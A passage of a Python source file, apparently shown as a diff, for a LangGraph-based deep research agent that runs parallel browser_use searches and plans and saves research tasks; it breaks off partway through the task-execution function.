|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
🤖 Fagun Browser Automation Testing Agent - Deep Research Agent
|
| 3 |
+
==============================================================
|
| 4 |
+
|
| 5 |
+
Advanced research agent for comprehensive data gathering and analysis.
|
| 6 |
+
|
| 7 |
+
Author: Mejbaur Bahar Fagun
|
| 8 |
+
Role: Software Engineer in Test
|
| 9 |
+
LinkedIn: https://www.linkedin.com/in/mejbaur/
|
| 10 |
+
"""
|
| 11 |
+
|
| 12 |
+
import asyncio
|
| 13 |
+
import json
|
| 14 |
+
import logging
|
| 15 |
+
import os
|
| 16 |
+
import threading
|
| 17 |
+
import uuid
|
| 18 |
+
from pathlib import Path
|
| 19 |
+
from typing import Any, Dict, List, Optional, TypedDict
|
| 20 |
+
|
| 21 |
+
# Disable telemetry
|
| 22 |
+
os.environ["BROWSER_USE_TELEMETRY"] = "false"
|
| 23 |
+
os.environ["BROWSER_USE_DISABLE_TELEMETRY"] = "true"
|
| 24 |
+
|
| 25 |
+
from browser_use.browser.browser import BrowserConfig
|
| 26 |
+
from langchain_community.tools.file_management import (
|
| 27 |
+
ListDirectoryTool,
|
| 28 |
+
ReadFileTool,
|
| 29 |
+
WriteFileTool,
|
| 30 |
+
)
|
| 31 |
+
|
| 32 |
+
# Langchain imports
|
| 33 |
+
from langchain_core.messages import (
|
| 34 |
+
AIMessage,
|
| 35 |
+
BaseMessage,
|
| 36 |
+
HumanMessage,
|
| 37 |
+
SystemMessage,
|
| 38 |
+
ToolMessage,
|
| 39 |
+
)
|
| 40 |
+
from langchain_core.prompts import ChatPromptTemplate
|
| 41 |
+
from langchain_core.tools import StructuredTool, Tool
|
| 42 |
+
|
| 43 |
+
# Langgraph imports
|
| 44 |
+
from langgraph.graph import StateGraph
|
| 45 |
+
from pydantic import BaseModel, Field
|
| 46 |
+
|
| 47 |
+
from browser_use.browser.context import BrowserContextConfig
|
| 48 |
+
|
| 49 |
+
from src.agent.browser_use.browser_use_agent import BrowserUseAgent
|
| 50 |
+
from src.browser.custom_browser import CustomBrowser
|
| 51 |
+
from src.controller.custom_controller import CustomController
|
| 52 |
+
from src.utils.mcp_client import setup_mcp_client_and_tools
|
| 53 |
+
|
| 54 |
+
logger = logging.getLogger(__name__)
|
| 55 |
+
|
| 56 |
+
# Constants
# Filenames used inside each research task's output directory.
REPORT_FILENAME = "report.md"
PLAN_FILENAME = "research_plan.md"
SEARCH_INFO_FILENAME = "search_info.json"

# Per-task cooperative stop signals (task_id -> threading.Event); checked by
# running research tasks so they can be cancelled externally.
_AGENT_STOP_FLAGS = {}
# Live BrowserUseAgent instances keyed by "<task_id>_<uuid>" so a running
# browser agent can be looked up and stopped from outside the task coroutine.
_BROWSER_AGENT_INSTANCES = {}
|
| 63 |
+
|
| 64 |
+
|
| 65 |
+
async def run_single_browser_task(
    task_query: str,
    task_id: str,
    llm: Any,  # Pass the main LLM
    browser_config: Dict[str, Any],
    stop_event: threading.Event,
    use_vision: bool = False,
) -> Dict[str, Any]:
    """Run one BrowserUseAgent research task in a dedicated browser.

    A fresh browser and browser context are created for this specific task and
    are always closed in the ``finally`` block, even on failure or stop.

    Args:
        task_query: The research question the browser agent should answer.
        task_id: Identifier of the parent research task; used to key the live
            agent instance in ``_BROWSER_AGENT_INSTANCES`` so it can be
            stopped externally.
        llm: Language model instance passed through to the BrowserUseAgent.
        browser_config: Browser options (``headless``, ``window_width``,
            ``window_height``, ``user_data_dir``, ``use_own_browser``,
            ``browser_binary_path``, ``wss_url``, ``cdp_url``).
        stop_event: Cooperative cancellation signal, checked before the run
            starts and after it finishes.
        use_vision: Whether the browser agent should use vision capabilities.

    Returns:
        A dict always containing ``query``, plus either ``result`` and a
        ``status`` of "completed"/"stopped"/"cancelled", or ``error`` and a
        ``status`` of "failed".
    """
    if not BrowserUseAgent:
        return {
            "query": task_query,
            "error": "BrowserUseAgent components not available.",
        }

    # --- Browser Setup ---
    # These should ideally come from the main agent's config
    headless = browser_config.get("headless", False)
    window_w = browser_config.get("window_width", 1280)
    window_h = browser_config.get("window_height", 1100)
    browser_user_data_dir = browser_config.get("user_data_dir", None)
    use_own_browser = browser_config.get("use_own_browser", False)
    browser_binary_path = browser_config.get("browser_binary_path", None)
    wss_url = browser_config.get("wss_url", None)
    cdp_url = browser_config.get("cdp_url", None)
    # NOTE(review): "disable_security" is accepted in browser_config but is
    # currently not forwarded to the browser; dropped the unused local.

    bu_browser = None
    bu_browser_context = None
    # Initialized up-front so the finally block can reference it safely even
    # when an exception is raised before the agent instance is registered
    # (previously this produced an UnboundLocalError on early failure,
    # masking the original exception).
    task_key = None
    try:
        logger.info(f"Starting browser task for query: {task_query}")
        extra_args = []
        if use_own_browser:
            # Environment variable wins over the configured binary path.
            browser_binary_path = os.getenv("BROWSER_PATH", None) or browser_binary_path
            if browser_binary_path == "":
                browser_binary_path = None
            browser_user_data = browser_user_data_dir or os.getenv("BROWSER_USER_DATA", None)
            if browser_user_data:
                extra_args += [f"--user-data-dir={browser_user_data}"]
        else:
            browser_binary_path = None

        bu_browser = CustomBrowser(
            config=BrowserConfig(
                headless=headless,
                browser_binary_path=browser_binary_path,
                extra_browser_args=extra_args,
                wss_url=wss_url,
                cdp_url=cdp_url,
                new_context_config=BrowserContextConfig(
                    window_width=window_w,
                    window_height=window_h,
                ),
            )
        )

        context_config = BrowserContextConfig(
            save_downloads_path="./tmp/downloads",
            window_height=window_h,
            window_width=window_w,
            force_new_context=True,
        )
        bu_browser_context = await bu_browser.new_context(config=context_config)

        # Simple controller example, replace with your actual implementation if needed
        bu_controller = CustomController()

        # Construct the task prompt for BrowserUseAgent
        # Instruct it to find specific info and return title/URL
        bu_task_prompt = f"""
        Research Task: {task_query}
        Objective: Find relevant information answering the query.
        Output Requirements: For each relevant piece of information found, please provide:
        1. A concise summary of the information.
        2. The title of the source page or document.
        3. The URL of the source.
        Focus on accuracy and relevance. Avoid irrelevant details.
        PDF cannot directly extract _content, please try to download first, then using read_file, if you can't save or read, please try other methods.
        """

        bu_agent_instance = BrowserUseAgent(
            task=bu_task_prompt,
            llm=llm,  # Use the passed LLM
            browser=bu_browser,
            browser_context=bu_browser_context,
            controller=bu_controller,
            use_vision=use_vision,
            source="webui",
        )

        # Store instance for potential stop() call
        task_key = f"{task_id}_{uuid.uuid4()}"
        _BROWSER_AGENT_INSTANCES[task_key] = bu_agent_instance

        # --- Run with Stop Check ---
        # BrowserUseAgent needs to internally check a stop signal or have a stop method.
        # We simulate checking before starting and assume `run` might be interruptible
        # or have its own stop mechanism we can trigger via bu_agent_instance.stop().
        if stop_event.is_set():
            logger.info(f"Browser task for '{task_query}' cancelled before start.")
            return {"query": task_query, "result": None, "status": "cancelled"}

        logger.info(f"Running BrowserUseAgent for: {task_query}")
        result = await bu_agent_instance.run()  # Assuming run is the main method
        logger.info(f"BrowserUseAgent finished for: {task_query}")

        final_data = result.final_result()

        if stop_event.is_set():
            logger.info(f"Browser task for '{task_query}' stopped during execution.")
            return {"query": task_query, "result": final_data, "status": "stopped"}
        else:
            logger.info(f"Browser result for '{task_query}': {final_data}")
            return {"query": task_query, "result": final_data, "status": "completed"}

    except Exception as e:
        logger.error(
            f"Error during browser task for query '{task_query}': {e}", exc_info=True
        )
        return {"query": task_query, "error": str(e), "status": "failed"}
    finally:
        if bu_browser_context:
            try:
                await bu_browser_context.close()
                bu_browser_context = None
                logger.info("Closed browser context.")
            except Exception as e:
                logger.error(f"Error closing browser context: {e}")
        if bu_browser:
            try:
                await bu_browser.close()
                bu_browser = None
                logger.info("Closed browser.")
            except Exception as e:
                logger.error(f"Error closing browser: {e}")

        # task_key stays None when setup failed before registration; pop() is
        # race-safe if an external caller already removed the entry.
        if task_key is not None:
            _BROWSER_AGENT_INSTANCES.pop(task_key, None)
|
| 209 |
+
|
| 210 |
+
|
| 211 |
+
class BrowserSearchInput(BaseModel):
    """Argument schema for the ``parallel_browser_search`` tool.

    The LLM fills this in when invoking the tool; the query list is truncated
    downstream to the configured maximum number of parallel browsers.
    """

    queries: List[str] = Field(
        description="List of distinct search queries to find information relevant to the research task."
    )
|
| 215 |
+
|
| 216 |
+
|
| 217 |
+
async def _run_browser_search_tool(
    queries: List[str],
    task_id: str,  # Injected dependency
    llm: Any,  # Injected dependency
    browser_config: Dict[str, Any],
    stop_event: threading.Event,
    max_parallel_browsers: int = 1,
) -> List[Dict[str, Any]]:
    """Fan out browser searches for the given queries and collect their results.

    At most ``max_parallel_browsers`` searches run concurrently (extra queries
    past that limit are dropped). The shared ``stop_event`` is honoured before
    each search starts and inside the individual browser tasks. Exceptions
    raised by individual searches are converted into "failed" result dicts
    rather than propagated.
    """
    # Limit queries just in case LLM ignores the description
    queries = queries[:max_parallel_browsers]
    logger.info(
        f"[Browser Tool {task_id}] Running search for {len(queries)} queries: {queries}"
    )

    gate = asyncio.Semaphore(max_parallel_browsers)

    async def bounded_search(query):
        # Wait for a concurrency slot, then bail out early on a stop request.
        async with gate:
            if stop_event.is_set():
                logger.info(
                    f"[Browser Tool {task_id}] Skipping task due to stop signal: {query}"
                )
                return {"query": query, "result": None, "status": "cancelled"}
            # Pass necessary injected configs and the stop event
            return await run_single_browser_task(
                query,
                task_id,
                llm,  # Pass the main LLM (or a dedicated one if needed)
                browser_config,
                stop_event,
                # use_vision could be added here if needed
            )

    search_results = await asyncio.gather(
        *(bounded_search(q) for q in queries), return_exceptions=True
    )

    # Normalize each outcome into a result dict, pairing it with its query.
    processed_results = []
    for query, outcome in zip(queries, search_results):
        if isinstance(outcome, Exception):
            logger.error(
                f"[Browser Tool {task_id}] Gather caught exception for query '{query}': {outcome}",
                exc_info=True,
            )
            processed_results.append(
                {"query": query, "error": str(outcome), "status": "failed"}
            )
        elif isinstance(outcome, dict):
            processed_results.append(outcome)
        else:
            logger.error(
                f"[Browser Tool {task_id}] Unexpected result type for query '{query}': {type(outcome)}"
            )
            processed_results.append(
                {"query": query, "error": "Unexpected result type", "status": "failed"}
            )

    logger.info(
        f"[Browser Tool {task_id}] Finished search. Results count: {len(processed_results)}"
    )
    return processed_results
|
| 284 |
+
|
| 285 |
+
|
| 286 |
+
def create_browser_search_tool(
        llm: Any,
        browser_config: Dict[str, Any],
        task_id: str,
        stop_event: threading.Event,
        max_parallel_browsers: int = 1,
) -> StructuredTool:
    """Build the ``parallel_browser_search`` StructuredTool.

    Pre-binds every runtime dependency (LLM, browser config, stop event,
    concurrency limit) onto ``_run_browser_search_tool`` so the LLM only has
    to supply the search queries defined by ``BrowserSearchInput``.
    """
    from functools import partial

    # Everything the coroutine needs besides the LLM-supplied arguments.
    dependencies = dict(
        task_id=task_id,
        llm=llm,
        browser_config=browser_config,
        stop_event=stop_event,
        max_parallel_browsers=max_parallel_browsers,
    )
    search_coroutine = partial(_run_browser_search_tool, **dependencies)

    return StructuredTool.from_function(
        coroutine=search_coroutine,
        name="parallel_browser_search",
        description=f"""Use this tool to actively search the web for information related to a specific research task or question.
It runs up to {max_parallel_browsers} searches in parallel using a browser agent for better results than simple scraping.
Provide a list of distinct search queries(up to {max_parallel_browsers}) that are likely to yield relevant information.""",
        args_schema=BrowserSearchInput,
    )
|
| 314 |
+
|
| 315 |
+
|
| 316 |
+
# --- Langgraph State Definition ---
|
| 317 |
+
|
| 318 |
+
|
| 319 |
+
class ResearchTaskItem(TypedDict):
    """One actionable research task inside a plan category."""

    # Human-readable description of what to investigate.
    task_description: str
    # Lifecycle state: "pending", "completed", or "failed".
    status: str
    # Search queries issued for this task, once executed (None before then).
    queries: Optional[List[str]]
    # Short summary of the task outcome, once executed (None before then).
    result_summary: Optional[str]
|
| 325 |
+
|
| 326 |
+
|
| 327 |
+
class ResearchCategoryItem(TypedDict):
    """A named research category grouping several tasks."""

    # Display name of the category (e.g. "Historical Development").
    category_name: str
    # Ordered tasks belonging to this category.
    tasks: List[ResearchTaskItem]
|
| 331 |
+
|
| 332 |
+
|
| 333 |
+
class DeepResearchState(TypedDict):
    """Shared LangGraph state threaded through the deep-research nodes."""

    # Unique identifier of this research run.
    task_id: str
    # The research topic supplied by the user.
    topic: str
    # Hierarchical plan: categories, each holding tasks.
    research_plan: List[ResearchCategoryItem]
    # Accumulated findings from browser searches and other tools.
    search_results: List[Dict[str, Any]]
    # Chat model used for planning, execution and synthesis.
    llm: Any
    # Tools the execution node may let the LLM call.
    tools: List[Tool]
    # Directory where plan / results / report files are persisted.
    output_dir: Path
    # Browser configuration forwarded to the search tool.
    browser_config: Dict[str, Any]
    # Final markdown report, set by the synthesis node.
    final_report: Optional[str]
    # Index of the category currently being executed.
    current_category_index: int
    # Index of the task within that category.
    current_task_index_in_category: int
    # Cooperative cancellation flag checked by every node.
    stop_requested: bool
    # Last error description, if any node failed.
    error_message: Optional[str]
    # Conversation history carried across task executions.
    messages: List[BaseMessage]
|
| 348 |
+
|
| 349 |
+
|
| 350 |
+
# --- Langgraph Nodes ---
|
| 351 |
+
|
| 352 |
+
|
| 353 |
+
def _load_previous_state(task_id: str, output_dir: str) -> Dict[str, Any]:
    """Reload a previous run's plan and search results from ``output_dir``.

    Parses the markdown checklist written by ``_save_plan_to_md`` back into
    ``ResearchCategoryItem``/``ResearchTaskItem`` structures, determines the
    next pending (category, task) indices, and loads the search-results JSON.

    Args:
        task_id: Identifier of the research run (currently unused here, kept
            for interface symmetry with the other persistence helpers).
        output_dir: Directory containing PLAN_FILENAME / SEARCH_INFO_FILENAME.

    Returns:
        A partial state dict with any of: "research_plan",
        "current_category_index", "current_task_index_in_category",
        "search_results", "error_message".
    """
    state_updates = {}
    plan_file = os.path.join(output_dir, PLAN_FILENAME)
    search_file = os.path.join(output_dir, SEARCH_INFO_FILENAME)

    loaded_plan: List[ResearchCategoryItem] = []
    next_cat_idx, next_task_idx = 0, 0
    found_pending = False  # True once the first still-pending task is located

    if os.path.exists(plan_file):
        try:
            with open(plan_file, "r", encoding="utf-8") as f:
                current_category: Optional[ResearchCategoryItem] = None
                lines = f.readlines()
                cat_counter = 0
                task_counter_in_cat = 0

                for line_num, line_content in enumerate(lines):
                    line = line_content.strip()
                    if line.startswith("## "):  # Category header
                        if current_category:  # Save previous category
                            loaded_plan.append(current_category)
                            if not found_pending:  # If previous category was all done, advance cat counter
                                cat_counter += 1
                                task_counter_in_cat = 0
                        category_name = line[3:].strip()
                        # FIX: _save_plan_to_md writes headers as "## <n>. <name>".
                        # The old parse (line[line.find(" "):]) kept the "<n>. "
                        # numbering, so every load/save round trip stacked prefixes
                        # like "## 1. 1. <name>". Strip a leading "<digits>. " here.
                        num_prefix, sep, remainder = category_name.partition(". ")
                        if sep and num_prefix.isdigit():
                            category_name = remainder.strip()
                        current_category = ResearchCategoryItem(category_name=category_name, tasks=[])
                    elif (line.startswith("- [ ]") or line.startswith("- [x]") or line.startswith(
                            "- [-]")) and current_category:  # Task checkbox line
                        status = "pending"
                        if line.startswith("- [x]"):
                            status = "completed"
                        elif line.startswith("- [-]"):
                            status = "failed"

                        task_desc = line[5:].strip()  # drop the 5-char "- [?]" marker
                        current_category["tasks"].append(
                            ResearchTaskItem(task_description=task_desc, status=status, queries=None,
                                             result_summary=None)
                        )
                        if status == "pending" and not found_pending:
                            next_cat_idx = cat_counter
                            next_task_idx = task_counter_in_cat
                            found_pending = True
                        if not found_pending:  # only increment while tasks are completed/failed
                            task_counter_in_cat += 1

                if current_category:  # Append last category
                    loaded_plan.append(current_category)

            if loaded_plan:
                state_updates["research_plan"] = loaded_plan
                if not found_pending and loaded_plan:  # All tasks were completed or failed
                    next_cat_idx = len(loaded_plan)  # Points beyond the last category
                    next_task_idx = 0
                state_updates["current_category_index"] = next_cat_idx
                state_updates["current_task_index_in_category"] = next_task_idx
                logger.info(
                    f"Loaded hierarchical research plan from {plan_file}. "
                    f"Next task: Category {next_cat_idx}, Task {next_task_idx} in category."
                )
            else:
                logger.warning(f"Plan file {plan_file} was empty or malformed.")

        except Exception as e:
            logger.error(f"Failed to load or parse research plan {plan_file}: {e}", exc_info=True)
            state_updates["error_message"] = f"Failed to load research plan: {e}"
    else:
        logger.info(f"Plan file {plan_file} not found. Will start fresh.")

    if os.path.exists(search_file):
        try:
            with open(search_file, "r", encoding="utf-8") as f:
                state_updates["search_results"] = json.load(f)
            logger.info(f"Loaded search results from {search_file}")
        except Exception as e:
            logger.error(f"Failed to load search results {search_file}: {e}")
            # Concatenate onto any plan-loading error rather than overwrite it.
            state_updates["error_message"] = (
                    state_updates.get("error_message", "") + f" Failed to load search results: {e}").strip()

    return state_updates
|
| 434 |
+
|
| 435 |
+
|
| 436 |
+
def _save_plan_to_md(plan: List[ResearchCategoryItem], output_dir: str):
    """Write the hierarchical plan as a Markdown checklist (PLAN_FILENAME).

    Categories become numbered "##" headers; tasks become checkbox items:
    "- [x]" completed, "- [ ]" pending, "- [-]" failed.
    """
    plan_file = os.path.join(output_dir, PLAN_FILENAME)
    try:
        with open(plan_file, "w", encoding="utf-8") as f:
            f.write(f"# Research Plan\n\n")
            for cat_idx, category in enumerate(plan):
                f.write(f"## {cat_idx + 1}. {category['category_name']}\n\n")
                for task in category['tasks']:
                    if task["status"] == "completed":
                        marker = "- [x]"
                    elif task["status"] == "pending":
                        marker = "- [ ]"
                    else:
                        marker = "- [-]"  # failed
                    f.write(f"  {marker} {task['task_description']}\n")
                f.write("\n")
        logger.info(f"Hierarchical research plan saved to {plan_file}")
    except Exception as e:
        logger.error(f"Failed to save research plan to {plan_file}: {e}")
|
| 451 |
+
|
| 452 |
+
|
| 453 |
+
def _save_search_results_to_json(results: List[Dict[str, Any]], output_dir: str):
    """Persist the accumulated search results as pretty-printed JSON.

    The file (SEARCH_INFO_FILENAME) is fully rewritten on every call, so it
    always reflects the latest snapshot of ``results``.
    """
    target_path = os.path.join(output_dir, SEARCH_INFO_FILENAME)
    try:
        with open(target_path, "w", encoding="utf-8") as fh:
            json.dump(results, fh, indent=2, ensure_ascii=False)
        logger.info(f"Search results saved to {target_path}")
    except Exception as e:
        logger.error(f"Failed to save search results to {target_path}: {e}")
|
| 463 |
+
|
| 464 |
+
|
| 465 |
+
def _save_report_to_md(report: str, output_dir: Path):
    """Saves the final report to a markdown file (REPORT_FILENAME).

    Failures are logged, not raised, so a disk error never aborts the run.
    """
    target_path = os.path.join(output_dir, REPORT_FILENAME)
    try:
        with open(target_path, "w", encoding="utf-8") as fh:
            fh.write(report)
        logger.info(f"Final report saved to {target_path}")
    except Exception as e:
        logger.error(f"Failed to save final report to {target_path}: {e}")
|
| 474 |
+
|
| 475 |
+
|
| 476 |
+
async def planning_node(state: DeepResearchState) -> Dict[str, Any]:
    """Generate (or resume) the hierarchical research plan for the topic.

    Asks the LLM for a JSON array of category objects, converts them into
    ResearchCategoryItem / ResearchTaskItem structures, persists the plan to
    markdown, and resets the execution indices. If a previously-loaded plan
    with progress exists, it is reused as-is.

    Returns a partial DeepResearchState update: either the (new or resumed)
    plan with reset indices, or an "error_message" on failure.
    """
    logger.info("--- Entering Planning Node ---")
    if state.get("stop_requested"):
        logger.info("Stop requested, skipping planning.")
        return {"stop_requested": True}

    llm = state["llm"]
    topic = state["topic"]
    existing_plan = state.get("research_plan")
    output_dir = state["output_dir"]

    # Resume path: a plan exists and at least one index has advanced past 0,
    # i.e. _load_previous_state found prior progress.
    if existing_plan and (
            state.get("current_category_index", 0) > 0 or state.get("current_task_index_in_category", 0) > 0):
        logger.info("Resuming with existing plan.")
        _save_plan_to_md(existing_plan, output_dir)  # Ensure it's saved initially
        # current_category_index and current_task_index_in_category should be set by _load_previous_state
        return {"research_plan": existing_plan}

    logger.info(f"Generating new research plan for topic: {topic}")

    # Prompt instructs the LLM to emit a JSON array of
    # {"category_name": str, "tasks": [str, ...]} objects.
    prompt_text = f"""You are a meticulous research assistant. Your goal is to create a hierarchical research plan to thoroughly investigate the topic: "{topic}".
The plan should be structured into several main research categories. Each category should contain a list of specific, actionable research tasks or questions.
Format the output as a JSON list of objects. Each object represents a research category and should have:
1. "category_name": A string for the name of the research category.
2. "tasks": A list of strings, where each string is a specific research task for that category.

Example JSON Output:
[
  {{
    "category_name": "Understanding Core Concepts and Definitions",
    "tasks": [
      "Define the primary terminology associated with '{topic}'.",
      "Identify the fundamental principles and theories underpinning '{topic}'."
    ]
  }},
  {{
    "category_name": "Historical Development and Key Milestones",
    "tasks": [
      "Trace the historical evolution of '{topic}'.",
      "Identify key figures, events, or breakthroughs in the development of '{topic}'."
    ]
  }},
  {{
    "category_name": "Current State-of-the-Art and Applications",
    "tasks": [
      "Analyze the current advancements and prominent applications of '{topic}'.",
      "Investigate ongoing research and active areas of development related to '{topic}'."
    ]
  }},
  {{
    "category_name": "Challenges, Limitations, and Future Outlook",
    "tasks": [
      "Identify the major challenges and limitations currently facing '{topic}'.",
      "Explore potential future trends, ethical considerations, and societal impacts of '{topic}'."
    ]
  }}
]

Generate a plan with 3-10 categories, and 2-6 tasks per category for the topic: "{topic}" according to the complexity of the topic.
Ensure the output is a valid JSON array.
"""
    messages = [
        SystemMessage(content="You are a research planning assistant outputting JSON."),
        HumanMessage(content=prompt_text)
    ]

    try:
        response = await llm.ainvoke(messages)
        raw_content = response.content
        # The LLM might wrap the JSON in backticks; strip a ```json or ```
        # fence before parsing. (Assumes a matching closing fence exists.)
        if raw_content.strip().startswith("```json"):
            raw_content = raw_content.strip()[7:-3].strip()
        elif raw_content.strip().startswith("```"):
            raw_content = raw_content.strip()[3:-3].strip()

        logger.debug(f"LLM response for plan: {raw_content}")
        parsed_plan_from_llm = json.loads(raw_content)

        # Convert the raw JSON into typed plan structures, tolerating the
        # common LLM deviations where a task is a dict instead of a string.
        new_plan: List[ResearchCategoryItem] = []
        for cat_idx, category_data in enumerate(parsed_plan_from_llm):
            if not isinstance(category_data,
                              dict) or "category_name" not in category_data or "tasks" not in category_data:
                logger.warning(f"Skipping invalid category data: {category_data}")
                continue

            tasks: List[ResearchTaskItem] = []
            for task_idx, task_desc in enumerate(category_data["tasks"]):
                if isinstance(task_desc, str):
                    tasks.append(
                        ResearchTaskItem(
                            task_description=task_desc,
                            status="pending",
                            queries=None,
                            result_summary=None,
                        )
                    )
                else:  # Sometimes LLM puts tasks as {"task": "description"}
                    if isinstance(task_desc, dict) and "task_description" in task_desc:
                        tasks.append(
                            ResearchTaskItem(
                                task_description=task_desc["task_description"],
                                status="pending",
                                queries=None,
                                result_summary=None,
                            )
                        )
                    elif isinstance(task_desc, dict) and "task" in task_desc:  # common LLM mistake
                        tasks.append(
                            ResearchTaskItem(
                                task_description=task_desc["task"],
                                status="pending",
                                queries=None,
                                result_summary=None,
                            )
                        )
                    else:
                        logger.warning(
                            f"Skipping invalid task data: {task_desc} in category {category_data['category_name']}")

            new_plan.append(
                ResearchCategoryItem(
                    category_name=category_data["category_name"],
                    tasks=tasks,
                )
            )

        if not new_plan:
            logger.error("LLM failed to generate a valid plan structure from JSON.")
            return {"error_message": "Failed to generate research plan structure."}

        logger.info(f"Generated research plan with {len(new_plan)} categories.")
        _save_plan_to_md(new_plan, output_dir)  # Save the hierarchical plan

        # Fresh plan: start execution at the very first task with no results.
        return {
            "research_plan": new_plan,
            "current_category_index": 0,
            "current_task_index_in_category": 0,
            "search_results": [],
        }

    except json.JSONDecodeError as e:
        # raw_content is always bound here: json.loads is only reached after it is set.
        logger.error(f"Failed to parse JSON from LLM for plan: {e}. Response was: {raw_content}", exc_info=True)
        return {"error_message": f"LLM generated invalid JSON for research plan: {e}"}
    except Exception as e:
        logger.error(f"Error during planning: {e}", exc_info=True)
        return {"error_message": f"LLM Error during planning: {e}"}
|
| 622 |
+
|
| 623 |
+
|
| 624 |
+
async def research_execution_node(state: DeepResearchState) -> Dict[str, Any]:
    """Execute the current research task by letting the tool-bound LLM act.

    Selects the task addressed by (current_category_index,
    current_task_index_in_category), invokes the LLM with the available tools,
    executes any requested tool calls (primarily ``parallel_browser_search``),
    records the outcome on the task, persists the plan and search results, and
    returns a partial state update that advances the indices to the next task.

    Returns:
        A partial DeepResearchState update. On stop requests the current
        indices are preserved; on errors "error_message" is set and the
        indices still advance so the run does not wedge on one task.
    """
    logger.info("--- Entering Research Execution Node ---")
    if state.get("stop_requested"):
        logger.info("Stop requested, skipping research execution.")
        return {
            "stop_requested": True,
            "current_category_index": state["current_category_index"],
            "current_task_index_in_category": state["current_task_index_in_category"],
        }

    plan = state["research_plan"]
    cat_idx = state["current_category_index"]
    task_idx = state["current_task_index_in_category"]
    llm = state["llm"]
    tools = state["tools"]
    output_dir = str(state["output_dir"])
    task_id = state["task_id"]  # For _AGENT_STOP_FLAGS

    # This check should ideally be handled by `should_continue`
    if not plan or cat_idx >= len(plan):
        logger.info("Research plan complete or categories exhausted.")
        return {}  # should route to synthesis

    current_category = plan[cat_idx]
    if task_idx >= len(current_category["tasks"]):
        # Category exhausted: advance to the next one; should_continue picks it up.
        logger.info(f"All tasks in category '{current_category['category_name']}' completed. Moving to next category.")
        return {
            "current_category_index": cat_idx + 1,
            "current_task_index_in_category": 0,
            "messages": state["messages"]  # Pass messages along
        }

    current_task = current_category["tasks"][task_idx]

    if current_task["status"] == "completed":
        # Resumed run: skip tasks that were already finished.
        logger.info(
            f"Task '{current_task['task_description']}' in category '{current_category['category_name']}' already completed. Skipping.")
        next_task_idx = task_idx + 1
        next_cat_idx = cat_idx
        if next_task_idx >= len(current_category["tasks"]):
            next_cat_idx += 1
            next_task_idx = 0
        return {
            "current_category_index": next_cat_idx,
            "current_task_index_in_category": next_task_idx,
            "messages": state["messages"]  # Pass messages along
        }

    logger.info(
        f"Executing research task: '{current_task['task_description']}' (Category: '{current_category['category_name']}')"
    )

    llm_with_tools = llm.bind_tools(tools)

    # Prompt the LLM with just this task; prior context rides in state["messages"].
    task_prompt_content = (
        f"Current Research Category: {current_category['category_name']}\n"
        f"Specific Task: {current_task['task_description']}\n\n"
        "Please use the available tools, especially 'parallel_browser_search', to gather information for this specific task. "
        "Provide focused search queries relevant ONLY to this task. "
        "If you believe you have sufficient information from previous steps for this specific task, you can indicate that you are ready to summarize or that no further search is needed."
    )
    current_task_message_history = [
        HumanMessage(content=task_prompt_content)
    ]
    if not state["messages"]:  # First actual execution message
        invocation_messages = [
            SystemMessage(
                content="You are a research assistant executing one task of a research plan. Focus on the current task only."),
        ] + current_task_message_history
    else:
        invocation_messages = state["messages"] + current_task_message_history

    try:
        logger.info(f"Invoking LLM with tools for task: {current_task['task_description']}")
        ai_response: BaseMessage = await llm_with_tools.ainvoke(invocation_messages)
        logger.info("LLM invocation complete.")

        tool_results = []
        executed_tool_names = []
        current_search_results = state.get("search_results", [])  # Get existing search results

        if not isinstance(ai_response, AIMessage) or not ai_response.tool_calls:
            logger.warning(
                f"LLM did not call any tool for task '{current_task['task_description']}'. Response: {ai_response.content[:100]}..."
            )
            # FIX: the old code set extra index keys on the task dict and did
            # `return current_task`, returning a task dict (with keys not in
            # DeepResearchState) as the graph state update while leaving the
            # task "pending" at unchanged indices — a malformed update and a
            # potential infinite re-execution loop. Instead, treat the direct
            # LLM answer as the task's result, save the plan, and advance.
            current_task["status"] = "completed"
            current_task["result_summary"] = f"LLM did not use a tool. Response: {ai_response.content}"
            _save_plan_to_md(plan, output_dir)
            next_task_idx = task_idx + 1
            next_cat_idx = cat_idx
            if next_task_idx >= len(current_category["tasks"]):
                next_cat_idx += 1
                next_task_idx = 0
            return {
                "research_plan": plan,
                "current_category_index": next_cat_idx,
                "current_task_index_in_category": next_task_idx,
                "messages": state["messages"] + current_task_message_history + [ai_response],
            }

        # Process tool calls requested by the LLM.
        for tool_call in ai_response.tool_calls:
            tool_name = tool_call.get("name")
            tool_args = tool_call.get("args", {})
            tool_call_id = tool_call.get("id")

            logger.info(f"LLM requested tool call: {tool_name} with args: {tool_args}")
            executed_tool_names.append(tool_name)
            selected_tool = next((t for t in tools if t.name == tool_name), None)

            if not selected_tool:
                logger.error(f"LLM called tool '{tool_name}' which is not available.")
                tool_results.append(
                    ToolMessage(content=f"Error: Tool '{tool_name}' not found.", tool_call_id=tool_call_id))
                continue

            try:
                # Honour a stop request raised between tool calls.
                stop_event = _AGENT_STOP_FLAGS.get(task_id)
                if stop_event and stop_event.is_set():
                    logger.info(f"Stop requested before executing tool: {tool_name}")
                    current_task["status"] = "pending"  # Or a new "stopped" status
                    _save_plan_to_md(plan, output_dir)
                    return {"stop_requested": True, "research_plan": plan, "current_category_index": cat_idx,
                            "current_task_index_in_category": task_idx}

                logger.info(f"Executing tool: {tool_name}")
                tool_output = await selected_tool.ainvoke(tool_args)
                logger.info(f"Tool '{tool_name}' executed successfully.")

                if tool_name == "parallel_browser_search":
                    # The browser tool returns a List[Dict] of per-query results.
                    current_search_results.extend(tool_output)
                else:
                    # Other tools: record a generic entry with stringified output.
